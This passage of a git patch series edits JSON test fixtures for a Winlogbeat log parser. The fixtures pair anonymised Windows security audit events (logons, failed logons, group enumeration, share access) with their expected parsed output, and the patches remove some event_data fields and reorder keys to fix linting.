Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" From ce15f8192df09ce7a518c56479354e2ad1ffe28e Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 11:43:35 +0100 Subject: [PATCH 16/84] fixed linting issues --- Beats/winlogbeat/tests/security_event_4624.json | 4 ++-- Beats/winlogbeat/tests/security_event_4625.json | 4 ++-- Beats/winlogbeat/tests/security_event_4634.json | 4 ++-- Beats/winlogbeat/tests/security_event_4662.json | 4 ++-- Beats/winlogbeat/tests/security_event_4672.json | 4 ++-- Beats/winlogbeat/tests/security_event_4689.json | 4 ++-- Beats/winlogbeat/tests/security_event_4720.json | 4 ++-- Beats/winlogbeat/tests/security_event_4722.json | 4 ++-- Beats/winlogbeat/tests/security_event_4723.json | 4 ++-- Beats/winlogbeat/tests/security_event_4725.json | 4 ++-- Beats/winlogbeat/tests/security_event_4726.json | 4 ++-- Beats/winlogbeat/tests/security_event_4768.json | 4 ++-- Beats/winlogbeat/tests/security_event_4769.json | 4 ++-- Beats/winlogbeat/tests/security_event_4798.json | 4 ++-- 14 files changed, 28 insertions(+), 28 deletions(-) diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json index 9e8cdfb26..fe8a200a5 100644 --- a/Beats/winlogbeat/tests/security_event_4624.json +++ b/Beats/winlogbeat/tests/security_event_4624.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + } }, "expected": { "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json index ac5882d46..85bda7ac7 100644 --- a/Beats/winlogbeat/tests/security_event_4625.json +++ b/Beats/winlogbeat/tests/security_event_4625.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 